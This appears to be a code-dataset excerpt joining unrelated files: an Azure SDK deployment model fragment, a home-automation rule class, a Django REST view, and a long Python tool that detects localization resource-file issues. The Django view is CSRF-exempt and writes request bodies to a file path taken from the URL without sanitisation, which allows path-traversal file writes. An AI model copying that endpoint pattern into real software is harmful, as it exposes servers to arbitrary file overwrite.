:type platform_update_domain_count: str
:param tags: Tags object.
:type tags: object
:ivar mode: Gets or sets the deployment mode. Default value:
"Incremental" .
:vartype mode: str
"""
_validation = {
'uri': {'required': True, 'constant': True},
'name': {'required': True},
'mode': {'required': True, 'constant': True},
}
_attribute_map = {
'uri': {'key': 'properties.templateLink.uri', 'type': 'str'},
'content_version': {'key': 'properties.templateLink.contentVersion', 'type': 'str'},
'location': {'key': 'properties.parameters.location.value', 'type': 'str'},
'name': {'key': 'properties.parameters.name.value', 'type': 'str'},
'platform_fault_domain_count': {'key': 'properties.parameters.platformFaultDomainCount.value', 'type': 'str'},
'platform_update_domain_count': {'key': 'properties.parameters.platformUpdateDomainCount.value', 'type': 'str'},
'tags': {'key': 'properties.parameters.tags.value', 'type': 'object'},
'mode': {'key': 'properties.mode', 'type': 'str'},
}
uri = "https://azuresdkci.blob.core.windows.net/templatehost/CreateAvailSet_2016-07-18/azuredeploy.json"
mode = "Incremental"
def __init__(self, name, content_version=None, location=None, platform_fault_domain_count="3", platform_update_domain_count="5", tags=None):
self.content_version = content_version
self.location = location
self.name = name
self.platform_fault_domain_count = platform_fault_domain_count
self.platform_update_domain_count = platform_update_domain_count
self.tags = tags
``` |
{
"source": "0CT3T/Daemon_Home_Integration",
"score": 2
} |
#### File: LED/Regle/Allumer.py
```python
from daemon.Module.Abstract.Rules import Rules
class Allumer(Rules):
def __init__(self, object):
self.object = object
super().__init__()
def test(self):
if self.object.getparamvalue("Mode") == "ETEINTE":
self.object.setparamvalue("Mode", "ALLUMER")
```
#### File: src/restAPI/views.py
```python
from __future__ import unicode_literals
import sys
from django.http import HttpResponse, Http404
from django.views.decorators.csrf import csrf_exempt
from daemon.initialisation import *
@csrf_exempt
def home(request,fichier):
if request.method == 'POST':
print(request.body)
with open(JSONdirectory + fichier, "w") as fichier:
fichier.write(request.body.decode("utf-8") )
return HttpResponse(status=201)
return Http404("only POST methode")
``` |
{
"source": "0Cubed/ZeroResourceDetector",
"score": 2
} |
#### File: 0Cubed/ZeroResourceDetector/resource_detector.py
```python
import argparse
import sys
import os
import codecs
import logging
import csv
import importlib
import re
import string
import locale
import json
import xml.etree.cElementTree as ET
import pyparsing as PY
from enum import Enum, IntEnum
from datetime import datetime, timezone
__author__ = "Zero<<EMAIL>>"
__version__ = "1.0.0"
__application__ = "resource detector"
BASE_LANGUAGE = "en-us"
STANDARDIZED_LANGUAGES = {
#Tier0-------------------------------------------------------------------------------------------
"en" : "en-us", "en-us" : "en-us", "1033" : "en-us", "english" : "en-us", "en_us" : "en-us",
#Tier1-------------------------------------------------------------------------------------------
"de" : "de-de", "de-de" : "de-de", "1031" : "de-de", "german" : "de-de", "de_de" : "de-de",
"es" : "es-es", "es-es" : "es-es", "3082" : "es-es", "spanish" : "es-es", "es_es" : "es-es", "es-mx" : "es-es",
"fr" : "fr-fr", "fr-fr" : "fr-fr", "1036" : "fr-fr", "french" : "fr-fr", "fr_fr" : "fr-fr",
"ja" : "ja-jp", "ja-jp" : "ja-jp", "1041" : "ja-jp", "japanese" : "ja-jp", "ja_jp" : "ja-jp",
"zh" : "zh-cn", "zh-cn" : "zh-cn", "2052" : "zh-cn", "chinese" : "zh-cn", "zh_cn" : "zh-cn", "zh-rcn" : "zh-cn", "zh-hans" : "zh-cn", "zh-chs" : "zh-cn", "zh_hans" : "zh-cn", "sc" : "zh-cn", "cn" : "zh-cn",
#Tier2-------------------------------------------------------------------------------------------
"ko" : "ko-kr", "ko-kr" : "ko-kr", "1042" : "ko-kr", "korean" : "ko-kr", "ko_kr" : "ko-kr",
"ru" : "ru-ru", "ru-ru" : "ru-ru", "1049" : "ru-ru", "russian" : "ru-ru", "ru_ru" : "ru-ru",
"tc" : "zh-tw", "zh-tw" : "zh-tw", "1028" : "zh-tw", "tw" : "zh-tw", "zh_tw" : "zh-tw", "zh-rtw" : "zh-tw", "zh-hant" : "zh-tw", "zh-cht" : "zh-tw", "zh_hant" : "zh-tw",
#Tier3-------------------------------------------------------------------------------------------
"ar" : "ar-sa", "ar-sa" : "ar-sa", "1025" : "ar-sa", "arabic" : "ar-sa", "ar_sa" : "ar-sa",
"da" : "da-dk", "da-dk" : "da-dk", "1030" : "da-dk", "danish" : "da-dk", "da_dk" : "da-dk",
"he" : "he-il", "he-il" : "he-il", "1037" : "he-il", "hebrew" : "he-il", "he_il" : "he-il",
"it" : "it-it", "it-it" : "it-it", "1040" : "it-it", "italian" : "it-it", "it_it" : "it-it",
"nl" : "nl-nl", "nl-nl" : "nl-nl", "1043" : "nl-nl", "dutch" : "nl-nl", "nl_nl" : "nl-nl",
"no" : "no-no", "no-no" : "no-no", "1044" : "no-no", "norwegian" : "no-no", "no_no" : "no-no", "nb-no" : "no-no", "nb" : "no-no", "nn-no" : "no-no", "nn" : "no-no",#TBD
"pt" : "pt-br", "pt-br" : "pt-br", "1046" : "pt-br", "portuguese" : "pt-br", "pt_br" : "pt-br",
"pt" : "pt-br", "pt-pt" : "pt-pt", "2070" : "pt-pt", "portuguese" : "pt-br", "pt_pt" : "pt-pt", #Add some duplicate items to keep coding format
"pl" : "pl-pl", "pl-pl" : "pl-pl", "1045" : "pl-pl", "polish" : "pl-pl", "pl_pl" : "pl-pl",
"sv" : "sv-se", "sv-se" : "sv-se", "1053" : "sv-se", "swedish" : "sv-se", "sv_se" : "sv-se",
#Others-----------------------------------------------------------------------------------------------
"bg" : "bg-bg", "bg-bg" : "bg-bg",
"lt" : "lt-lt", "lt-lt" : "lt-lt",
"ca" : "ca-es", "ca-es" : "ca-es",
"cs" : "cs-cz", "cs-cz" : "cs-cz",
"cy" : "cy-gb", "cy-gb" : "cy-gb",
"el" : "el-gr", "el-gr" : "el-gr",
"fi" : "fi-fi", "fi-fi" : "fi-fi",
"et" : "et-ee", "et-ee" : "et-ee",
"hi" : "hi-in", "hi-in" : "hi-in",
"hu" : "hu-hu", "hu-hu" : "hu-hu",
"id" : "id-id", "id-id" : "id-id",
"lv" : "lv-lv", "lv-lv" : "lv-lv",
"ro" : "ro-ro", "ro-ro" : "ro-ro",
"ru" : "ru-ru", "ru-ru" : "ru-ru",
"sk" : "sk-sk", "sk-sk" : "sk-sk",
"sl" : "sl-si", "sl-si" : "sl-si",
"th" : "th-th", "th-th" : "th-th",
"tr" : "tr-tr", "tr-tr" : "tr-tr",
"uk" : "uk-ua", "uk-ua" : "uk-ua",
"af" : "af-za", "af-za" : "af-za",
"sq" : "sq-al", "sq-al" : "sq-al",
"am" : "am-et", "am-et" : "am-et",
"hy" : "hy-am", "hy-am" : "hy-am",
"as" : "as-in", "as-in" : "as-in",
"eu" : "eu-es", "eu-es" : "eu-es",
"be" : "be-by", "be-by" : "be-by",
"bn" : "bn-bd", "bn-bd" : "bn-bd", #TBD
"ca" : "ca-es", "ca-es" : "ca-es", #TBD
"gl" : "gl-es", "gl-es" : "gl-es",
"ka" : "ka-ge", "ka-ge" : "ka-ge",
"gu" : "gu-in", "gu-in" : "gu-in",
"is" : "is-is", "is-is" : "is-is",
"ga" : "ga-ie", "ga-ie" : "ga-ie",
"xh" : "xh-za", "xh-za" : "xh-za",
"zu" : "zu-za", "zu-za" : "zu-za",
"kn" : "kn-in", "kn-in" : "kn-in",
"kk" : "kk-kz", "kk-kz" : "kk-kz",
"km" : "km-kh", "km-kh" : "km-kh",
"rw" : "rw-rw", "rw-rw" : "rw-rw",
"sw" : "sw-ke", "sw-ke" : "sw-ke",
"lb" : "lb-lu", "lb-lu" : "lb-lu",
"mk" : "mk-mk", "mk-mk" : "mk-mk",
"ms" : "ms-bn", "ms-bn" : "ms-bn", #TBD
"ml" : "ml-in", "ml-in" : "ml-in",
"mt" : "mt-mt", "mt-mt" : "mt-mt",
"mr" : "mr-in", "mr-in" : "mr-in",
"ne" : "ne-np", "ne-np" : "ne-np",
"or" : "or-in", "or-in" : "or-in",
"fa" : "fa-ir", "fa-ir" : "fa-ir",
"tn" : "tn-bw", "tn-bw" : "tn-bw", #TBD
"si" : "si-lk", "si-lk" : "si-lk",
"ta" : "ta-in", "ta-in" : "ta-in",
"te" : "te-in", "te-in" : "te-in",
"ti" : "ti-et", "ti-et" : "ti-et",
"ur" : "ur-pk", "ur-pk" : "ur-pk",
"vi" : "vi-vn", "vi-vn" : "vi-vn",
"cy" : "cy-gb", "cy-gb" : "cy-gb",
"wo" : "wo-sn", "wo-sn" : "wo-sn",
"hr" : "hr-hr", "hr-hr" : "hr-hr", "hr-ba" : "hr-hr", #TBD
"sr" : "sr-Latn", "sr-Latn" : "sr-Latn", #TBD
"bs" : "bs-cyrl", "bs-cyrl" : "bs-cyrl", #TBD
"pa" : "pa-arab", "pa-arab" : "pa-arab", #TBD
"mi" : "mi-latn", "mi-latn" : "mi-latn", #TBD
"nso" : "nso-za", "nso-za" : "nso-za",
"quz" : "quz-bo", "quz-bo" : "quz-bo", #TBD
"prs" : "prs-af", "prs-af" : "prs-af", #TBD
"kok" : "kok-in", "kok-in" : "kok-in",
"fil" : "fil-latn", "fil-latn" : "fil-latn", #TBD
"gb-latn" : "gb-gb", "gb-gb" : "gb-gb",
"ig-latn" : "ig-ng", "ig-ng" : "ig-ng",
"yo-latn" : "yo-ng", "yo-ng" : "yo-ng",
"ky-cyrl" : "ky-kg", "ky-kg" : "ky-kg",
"tk-cyrl" : "tk-latn", "tk-latn" : "tk-latn", #TBD
"tt-arab" : "tt-cyrl", "tt-cyrl" : "tt-cyrl", #TBD
"tg-arab" : "tg-cyrl", "tg-cyrl" : "tg-cyrl", #TBD
"iu-cans" : "iu-latn", "iu-latn" : "iu-latn", #TBD
"mn-cyrl" : "mn-mong", "mn-mong" : "mn-mong", #TBD
"az-arab" : "az-arab-az", "az-arab-az" : "az-arab-az", #TBD
"sr-cyrl" : "sr-cyrl-cs", "sr-cyrl-cs" : "sr-cyrl-cs", #TBD
"quc-latn" : "qut-gt", "qut-gt" : "qut-gt", #TBD
"chr-cher" : "chr-cher-us", "chr-cher-us" : "chr-cher-us", #TBD
"uz-latn-uz" : "uz-latn", "uz-latn" : "uz-latn",
"sd-arab-pk" : "sd-arab", "sd-arab" : "sd-arab", #TBD
"ha-latn-ng" : "ha-latn", "ha-latn" : "ha-latn",
"ku-arab-iq" : "ku-arab", "ku-arab" : "ku-arab",
}
LANGUAGE_ENCODINGS = {
#Tier0------------------------------------------------------
"en-us" : "cp1252", #Use "cp1252" instead of "ascii" here because sometimes English resource file can be successfully opened with the former but not the later
#Tier1------------------------------------------------------
"de-de" : "cp1252",
"es-es" : "cp1252",
"fr-fr" : "cp1252",
"ja-jp" : "shift_jis", #"cp932"
"zh-cn" : "cp936",
#Tier2------------------------------------------------------
"ko-kr" : "cp949",
"ru-ru" : "cp1251",
"zh-tw" : "big5", #"cp950"
#Tier3------------------------------------------------------
"ar-sa" : "cp1256",
"da-dk" : "cp865",
"he-il" : "cp1255",
"it-it" : "ascii", #TBD
"nl-nl" : "ascii", #TBD
"no-no" : "cp865",
"pt-br" : "cp860",
"pl-pl" : "ascii", #TBD
"sv-se" : "ascii", #TBD
}
TAB_WIDTH = 4
LOG = None
class Severity(Enum):
warning = "warning"
error = "error"
class IssueCode(IntEnum):
duplicate_key = 2000
missing_key = 2001
redundant_key = 2002
untranslated_value = 2003
unused_key = 2004
improperly_used_key = 2005
missing_file = 2006
redundant_file = 2007
unmatched_placeholder = 2008
format_error = 2009
encoding_error = 2010
class IssueName(Enum):
duplicate_key = "duplicate key"
missing_key = "missing key"
redundant_key = "redundant key"
untranslated_value = "untranslated value"
unused_key = "unused key"
improperly_used_key = "undefined key"
missing_file = "missing file"
redundant_file = "redundant file"
unmatched_placeholder = "unmatched placeholder"
format_error = "format error"
encoding_error = "encoding error"
class Description(Enum):
duplicate_key = "duplicate key in resource file(s)"
missing_key = "missing key in localized resource file(s)"
redundant_key = "redundant key in localized resource file(s)"
untranslated_value = "untranslated string value in localized resource file"
unused_key = "unused key in resource file"
improperly_used_key = "undefined resource key used in source code"
missing_file = "missing resource file(s)"
redundant_file = "redundant resource file(s)"
unmatched_placeholder = "unmatched placeholder(s) in localized resource file"
format_error = "string value with format error in resource file"
encoding_error = "unknown or incorrect encoding of resource file"
class Context(Enum):
duplicate_key = "key=\<KEY>, language(s)=\u2308{1}\u2309"
missing_key = "key=\<KEY>, language(s)=\u2308{1}\u2309"
redundant_key = "key=\<KEY>, language(s)=\u2308{1}\u2309"
untranslated_value = "key=\u2308{0}\u2309, value=\u2308{1}\u2309"
unused_key = "key=\<KEY>"
improperly_used_key = "{0}"
missing_file = "language(s)=\u2308{0}\u2309"
redundant_file = "language(s)=\u2308{0}\u2309"
unmatched_placeholder = "key=\u2308{0}\u2309, base value=\u2308{1}\u2309, localized value=\u2308{2}\u2309"
format_error = "key=\u2308{0}\u2309, value=\u2308{1}\u2309"
encoding_error = "{0}"
class Issue:
def __init__(self, file, line, column_begin, column_begin_offset, column_end, severity, code, description, context, information = None):
self.file= file
self.line = line
self.column_begin = column_begin
self.column_begin_offset = column_begin_offset
self.column_end = column_end
self.code = code
self.description = description
self.severity = severity
self.context = context
self.information = information
def write(self):
issue = "file: {file}, ".format(file = self.file)
if self.line or self.column_begin or self.column_end:
issue += "line: {line}, column begin: {column_begin}, column end: {column_end}, ".format(line = self.line, column_begin = self.column_begin + self.column_begin_offset, column_end = self.column_end)
issue += "issue: {description}, severity: {severity}, context: {context}".format(description = self.description.value, severity = self.severity.value, context = self.context.replace("\u2308", "").replace("\u2309", ""))
if self.information:
issue += ", information: {information}".format(information = self.information)
LOG.info(issue)
def write_with_position(self):
LOG.info("file: {file}, line: {line}, column begin: {column_begin}, column end: {column_end}, issue: {description}, severity: {severity}, context: {context}".format(file = self.file, line = self.line, column_begin = self.column_begin + self.column_begin_offset, column_end = self.column_end, description = self.description.value, severity = self.severity.value, context = self.context.replace("\u2308", "").replace("\u2309", "")))
def write_without_position(self):
LOG.info("file: {file}, issue: {description}, severity: {severity}, context: {context}".format(file = self.file, description = self.description.value, severity = self.severity.value, context = self.context.replace("\u2308", "").replace("\u2309", "")))
class Issues:
def __init__(self):
self.issues = []
self.warnings = []
self.errors = []
self.issue_count = 0
self.warning_count = 0
self.error_count = 0
def add(self, issue):
self.issues.append(issue)
self.issue_count += 1
if issue.severity == Severity.warning:
self.warnings.append(issue)
self.warning_count += 1
elif issue.severity == Severity.error:
self.errors.append(issue)
self.error_count += 1
else:
pass
def extend(self, issues_add):
if not issues_add:
return
self.issues.extend(issues_add.issues)
self.warnings.extend(issues_add.warnings)
self.errors.extend(issues_add.errors)
self.issue_count += issues_add.issue_count
self.warning_count += issues_add.warning_count
self.error_count += issues_add.error_count
def get_issues(self):
for issue in self.issues:
yield issue
def get_warnings(self):
for warning in self.warnings:
yield warning
def get_errors(self):
for error in self.errors:
yield error
class BaseResFile:
def __init__(self, directory, file, extension, language = None):
self.directory = directory
self.file = file
self.extension = extension
self.path = os.path.join(self.directory, self.file)
if language:
self.language = language
else:
self.language = self.get_language()
self.keys = set()
self.values = []
self.key_value_pairs = {}
#self.key_line_pairs = {}
self.duplicate_keys = []
self.escape_error_keys = []
self.item_count = 0
self.encoding_error = ""
def reset_value_containers(self):
self.keys = set()
self.values = []
self.key_value_pairs = {}
#self.key_line_pairs = {}
self.duplicate_keys = []
self.escape_error_keys = []
self.item_count = 0
def get_language(self):
sub_names = self.file.lower().split(".")
try:
sub_name = sub_names[-2]
if sub_name in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_name]
except IndexError:
pass
for sub_name in sub_names:
if sub_name in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_name]
sub_dirs = self.directory.lower().split(os.sep)
try:
sub_dir = sub_dirs[-1]
if sub_dir in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_dir]
except IndexError:
pass
#Is the following necessary? Do we need to decide whether the other sub directory is language id besides the last sub directory?
for sub_dir in sub_dirs:
if sub_dir in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_dir]
return BASE_LANGUAGE
def is_file(self):
return os.path.isfile(self.path)
def read(self):
try:
f = open(self.path, "rb")
bin_data = f.read()
f.close()
except Exception as e:
LOG.error("Cannot open file '{path}' to read: {exception}".format(path = self.path, exception = e))
return None
for bom, encoding in {codecs.BOM_UTF8 : "utf_8", codecs.BOM_UTF16_BE : "utf_16_be", codecs.BOM_UTF16_LE : "utf_16_le", codecs.BOM_UTF32_BE : "utf_32_be", codecs.BOM_UTF32_LE : "utf_32_le"}.items():
if bin_data.startswith(bom):
try:
return bin_data[len(bom):].decode(encoding)
except UnicodeDecodeError:
#LOG.error("Cannot read file '{path}', the real encoding is not the same as {encoding} encoding detected by BOM".format(path = self.path, encoding = encoding))
self.encoding_error = "the real encoding is not the same as '{encoding}' encoding detected by BOM".format(encoding = encoding)
return None
try:
return bin_data.decode("utf_8")
except UnicodeDecodeError:
pass
if self.language in LANGUAGE_ENCODINGS.keys():
try:
return bin_data.decode(LANGUAGE_ENCODINGS[self.language])
except UnicodeDecodeError:
pass
try:
return bin_data.decode("cp1252")#some localized resource files are not translated
except UnicodeDecodeError:
#LOG.error("Cannot read file '{0}', encoding is unknown".format(self.path))
self.encoding_error = "unknown encoding"
return None
else:
#LOG.error("Cannot read file '{0}', encoding is unknown".format(self.path))
self.encoding_error = "unknown encoding"
return None
def get_group_id(self):
sub_names = self.file.split(".")
file_adjusted = ""
for sub_name in sub_names:
if not sub_name.lower() in STANDARDIZED_LANGUAGES.keys():
file_adjusted += sub_name
#dir_adjusted = self.directory
#base_name = os.path.basename(self.directory).lower()
#if base_name in STANDARDIZED_LANGUAGES.keys():
# dir_adjusted = os.path.dirname(self.directory)
#return file_adjusted, dir_adjusted
#remove language in whatever position instead of the last position: add language position as the third id(the position set to 1 if there is no language)
sub_dirs = self.directory.split(os.sep)
dir_adjusted = sub_dirs
index = 0
for sub_dir in sub_dirs:
if sub_dir.lower() in STANDARDIZED_LANGUAGES.keys():
dir_adjusted.remove(sub_dir)
break
index += 1
return file_adjusted, os.sep.join(dir_adjusted), index
def parse(self, parsing_patterns = None):
pass
class ResFileGroup:
def __init__(self, base_res_file = None):
self.res_files = {}
self.localized_res_files = {}
self.base_res_file = base_res_file
#TODO: check whether the language of base_res_file is BASE_LANGUAGE
if base_res_file:
self.res_files[base_res_file.language] = base_res_file
def add_resource_file(self, res_file):
#TODO: check the language of current file exists in group
self.res_files[res_file.language] = res_file
if res_file.language != BASE_LANGUAGE:
self.localized_res_files[res_file.language] = res_file
else:
if self.base_res_file:
LOG.warning("Two English resource files found in a group. If the languages of them are wrongly-determined, contact the tool author, otherwise remove unused resource file in source code or check the configuration file to make sure correct resource file is used. Two suspect resource files are:\n '{base_file}'\n '{current_file}'".format(base_file = self.base_res_file.path, current_file = res_file.path))
self.base_res_file = res_file
class BaseResDetector:
def __init__(self, dir_input, res_files_input, config_input, type_input):
self.src_dir = dir_input
self.config = config_input
self.detect_languages = set()
self.detect_issues = set()
self.res_files = res_files_input
self.res_file_type = type_input
self.res_file_ext = self.res_files[0].extension
self.res_file_groups = []
self.issues = Issues()
self.res_file_count = 0
self.item_count = 0
def detect(self):
self.group_resource_files()
self.parse_resource_files()
self.filter_resource_file_groups()
self.get_detect_languages()
self.get_detect_issues()
self.detect_duplicate_keys()
self.detect_missing_keys()
self.detect_redundant_keys()
self.detect_untranslated_values()
self.detect_unused_and_undefined_keys()
self.detect_missing_resource_files()
self.detect_redundant_resource_files()
self.detect_unmatched_placeholders()
self.detect_values_with_format_error()
self.detect_encoding_errors()
def print_group(self):
for res_file_group in self.res_file_groups:
for language, res_file in sorted(res_file_group.res_files.items()):
res_file_info = res_file.path + " " + language
if res_file == res_file_group.base_res_file:
res_file_info += "------base------"
LOG.info(res_file_info)
LOG.info("************************************************************************************************************************")
def write_configuration(self):
self.group_resource_files()
self.parse_resource_files()
self.filter_resource_file_groups()
self.get_detect_languages()
self.get_detect_issues()
config_file = open(file = self.config.config_file_path, mode = "a", encoding = "utf_8_sig")
LOG.info("Writing configuration...")
config_file.write(self.config.detector_switch_attrs[self.res_file_type] + " = True\n")
config_file.write("{attr_name} = [{detect_issues}]\n".format(attr_name = self.config.detect_issues_attrs[self.res_file_type], detect_issues = ", ".join(['"{item}"'.format(item = item.value) for item in IssueName if item.value in self.detect_issues])))
config_file.write(self.config.detect_languages_attrs[self.res_file_type] + " = [")
for language in sorted(self.detect_languages):
config_file.write("\"" + language + "\", ")
config_file.write("]\n")
config_file.write(self.config.fixed_res_groups_attrs[self.res_file_type] + " = True\n")
config_file.write(self.config.res_groups_attrs[self.res_file_type] + " =\\\n[\n")
for res_file_group in self.res_file_groups:
config_file.write("{\n")
for language, res_file in sorted(res_file_group.res_files.items()):
config_file.write("\"" + language + "\" : R\"" + res_file.path + "\",\n")
config_file.write("},\n")
config_file.write("]\n\n\n")
config_file.close()
def group_resource_files(self):
use_fixed_res_file_group = True
if self.config.use_user_config:
try:
use_fixed_res_file_group = getattr(self.config.config_module, self.config.fixed_res_groups_attrs[self.res_file_type])
except AttributeError:
pass
if self.config.use_user_config and use_fixed_res_file_group:
LOG.info("Reading resource file group information from configuration file...")
try:
res_file_groups_config = getattr(self.config.config_module, self.config.res_groups_attrs[self.res_file_type])
except AttributeError:
LOG.critical("'{group_name}' is not defined in configuration file".format(group_name = self.config.res_groups_attrs[self.res_file_type]))
quit_application(-1)
for res_file_group_config in res_file_groups_config:
res_file_group = ResFileGroup()
for language_key, path in res_file_group_config.items():
absolute_path = os.path.join(self.src_dir, path)
directory = os.path.dirname(absolute_path)
file = os.path.basename(absolute_path)
if not file.endswith("." + self.res_file_ext):
LOG.critical("'{file}' is not a '{type}' resource file".format(file = absolute_path, type = self.res_file_ext))
quit_application(-1)
if not os.path.isfile(absolute_path):
LOG.critical("'{path}' does not exist".format(path = absolute_path))
quit_application(-1)
language = None
try:
language = STANDARDIZED_LANGUAGES[language_key]
except KeyError:
LOG.critical("'{language_key}' is not a valid language, please refer to the following: {standardized_languages}".format(language_key = language_key, standardized_languages = "'" + "', '".join(STANDARDIZED_LANGUAGES.keys()) + "'."))
quit_application(-1)
res_file = self.config.res_file_classes[self.res_file_type](directory , file, self.res_file_ext, language)
res_file_group.add_resource_file(res_file)
self.res_file_groups.append(res_file_group)
else:
LOG.info("Grouping resource files...")
id_group_pairs = {}
for res_file in self.res_files:
group_id = res_file.get_group_id()
res_file_group = id_group_pairs.get(group_id)
if res_file_group:
res_file_group.add_resource_file(res_file)
else:
res_file_group = ResFileGroup()
res_file_group.add_resource_file(res_file)
id_group_pairs[group_id] = res_file_group
self.res_file_groups.append(res_file_group)
def get_detect_issues(self):
if self.config.use_user_config:
LOG.info("Reading issue types to be detected from configuration file...")
self.detect_issues = getattr(self.config.config_module, self.config.detect_issues_attrs[self.res_file_type], self.config.default_detect_issues)
else:
LOG.info("Getting default issue types to be detected...")
self.detect_issues = self.config.default_detect_issues
def get_detect_languages(self):
if self.config.use_user_config:
LOG.info("Reading languages to be detected from configuration file...")
try:
self.detect_languages = set(getattr(self.config.config_module, self.config.detect_languages_attrs[self.res_file_type]))
except AttributeError:
LOG.critical("Cannot read languages from configuration files")
quit_application(-1)
else:
LOG.info("Determining languages to be detected...")
language_counts = {}
max_count = 0
for res_file_group in self.res_file_groups:
num = len(res_file_group.res_files.keys())
if num != 1:
if not num in language_counts.keys():
language_counts[num] = 0
language_counts[num] += 1
current_count = language_counts[num]
if current_count > max_count:
max_count = current_count
self.detect_languages = set(res_file_group.res_files.keys())
elif current_count == max_count:
current_languages = set(res_file_group.res_files.keys())
if len(current_languages) > len(self.detect_languages):
self.detect_languages = current_languages
else:
pass
if max_count == 0:
try:
self.detect_languages = set(self.res_file_groups[0].res_files.keys())
except IndexError:
pass
LOG.info("Detect language(s): {languages}".format(languages = " ".join(sorted(self.detect_languages))))
def get_parsing_patterns(self):
return None
def parse_resource_files(self):
LOG.info("Parsing resource files, which may take some time...")
parsing_patterns = self.get_parsing_patterns()
for res_file_group in self.res_file_groups:
for language, res_file in res_file_group.res_files.items():
res_file.parse(parsing_patterns)
self.item_count += res_file.item_count
def filter_resource_file_groups(self):
LOG.info("Removing group where each file has no string...")
temp_groups = list(self.res_file_groups)
self.res_file_groups = []
for res_file_group in temp_groups:
qualified_flag = False
for language, res_file in res_file_group.res_files.items():
if (res_file.item_count != 0) or res_file.encoding_error:
qualified_flag = True
if qualified_flag:
self.res_file_groups.append(res_file_group)
self.res_file_count += len(res_file_group.res_files)
def detect_missing_resource_files(self):
if IssueName.missing_file.value not in self.detect_issues:
return
LOG.info("Detecting missing localized resource files...")
for res_file_group in self.res_file_groups:
base_res_file = res_file_group.base_res_file
if not base_res_file:
continue
missing_languages = self.detect_languages - set(res_file_group.res_files.keys())
formatted_languages = "/".join(sorted(missing_languages))
if formatted_languages:
issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.missing_file, description = Description.missing_file, severity = Severity.warning, context = Context.missing_file.value.format(formatted_languages))
self.issues.add(issue)
def detect_redundant_resource_files(self):
if IssueName.redundant_file.value not in self.detect_issues:
return
LOG.info("Detecting redundant localized resource files...")
for res_file_group in self.res_file_groups:
base_res_file = res_file_group.base_res_file
if not base_res_file:
continue
redundant_languages = set(res_file_group.res_files.keys()) - self.detect_languages
formatted_languages = "/".join(sorted(redundant_languages))
if formatted_languages:
issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.redundant_file, description = Description.redundant_file, severity = Severity.warning, context = Context.redundant_file.value.format(formatted_languages))
self.issues.add(issue)
def detect_duplicate_keys(self):
if IssueName.duplicate_key.value not in self.detect_issues:
return
LOG.info("Detecting duplicate keys in resource files...")
for res_file_group in self.res_file_groups:
base_res_file = res_file_group.base_res_file
if not base_res_file:
continue
key_languages = {}
for language, res_file in sorted(res_file_group.res_files.items()):
for duplicate_key in res_file.duplicate_keys:
duplicate_languages = key_languages.get(duplicate_key, None)
if duplicate_languages:
key_languages[duplicate_key] = duplicate_languages + "/" + language
else:
key_languages[duplicate_key] = language
for duplicate_key, duplicate_languages in sorted(key_languages.items()):
issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.duplicate_key, description = Description.duplicate_key, severity = Severity.error, context = Context.duplicate_key.value.format(duplicate_key, duplicate_languages))
self.issues.add(issue)
def detect_missing_keys(self):
if IssueName.missing_key.value not in self.detect_issues:
return
LOG.info("Detecting missing keys in localized resource files...")
for res_file_group in self.res_file_groups:
base_res_file = res_file_group.base_res_file
if not base_res_file:
continue
base_keys = base_res_file.keys
key_languages = {}
for language, res_file in sorted(res_file_group.localized_res_files.items()):
missing_keys = base_keys - res_file.keys
for missing_key in missing_keys:
missing_languages = key_languages.get(missing_key, None)
if missing_languages:
key_languages[missing_key] = missing_languages + "/" + language
else:
key_languages[missing_key] = language
for missing_key, missing_languages in sorted(key_languages.items()):
issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.missing_key, description = Description.missing_key, severity = Severity.error, context = Context.missing_key.value.format(missing_key, missing_languages))
self.issues.add(issue)
def detect_redundant_keys(self):
if IssueName.redundant_key.value not in self.detect_issues:
return
LOG.info("Detecting redundant keys in localized resource files...")
for res_file_group in self.res_file_groups:
base_res_file = res_file_group.base_res_file
if not base_res_file:
continue
base_keys = base_res_file.keys
key_languages = {}
for language, res_file in sorted(res_file_group.localized_res_files.items()):
redundant_keys = res_file.keys - base_keys
for redundant_key in redundant_keys:
redundant_languages = key_languages.get(redundant_key, None)
if redundant_languages:
key_languages[redundant_key] = redundant_languages + "/" + language
else:
key_languages[redundant_key] = language
for redundant_key, redundant_languages in sorted(key_languages.items()):
issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.redundant_key, description = Description.redundant_key, severity = Severity.error, context = Context.redundant_key.value.format(redundant_key, redundant_languages))
self.issues.add(issue)
def is_translation_necessary(self, value):
if not value:
return False
if value.isnumeric():
return False
#cannot make sure url is not necessary to be translated
#if value.startswith("http://") or value.startswith("https://"):
#return False
return True
def detect_untranslated_values(self):
if IssueName.untranslated_value.value not in self.detect_issues:
return
LOG.info("Detecting untranslated values in resource files...")
for res_file_group in self.res_file_groups:
base_res_file = res_file_group.base_res_file
if not base_res_file:
continue
base_keys = base_res_file.keys
sorted_base_keys = sorted(base_keys)
base_key_value_pairs = base_res_file.key_value_pairs
for language, res_file in sorted(res_file_group.localized_res_files.items()):
target_keys = res_file.keys
target_key_value_pairs = res_file.key_value_pairs
for key in sorted_base_keys:
if key in target_keys:
target_value = target_key_value_pairs[key]
if (base_key_value_pairs[key] == target_value) and self.is_translation_necessary(target_value):
issue = Issue(file = res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.untranslated_value, description = Description.untranslated_value, severity = Severity.warning, context = Context.untranslated_value.value.format(key, target_value))
self.issues.add(issue)
def detect_values_with_format_error(self):
if IssueName.format_error.value not in self.detect_issues:
return
LOG.info("Detecting string value format issues in resource files...")
for res_file_group in self.res_file_groups:
for language, res_file in sorted(res_file_group.res_files.items()):
key_value_pairs = res_file.key_value_pairs
for escape_error_key in res_file.escape_error_keys:
issue = Issue(file = res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.format_error, description = Description.format_error, severity = Severity.error, context = Context.format_error.value.format(escape_error_key, key_value_pairs[escape_error_key]))
self.issues.add(issue)
def get_placeholder_pattern(self):
return None
def detect_unmatched_placeholders(self):
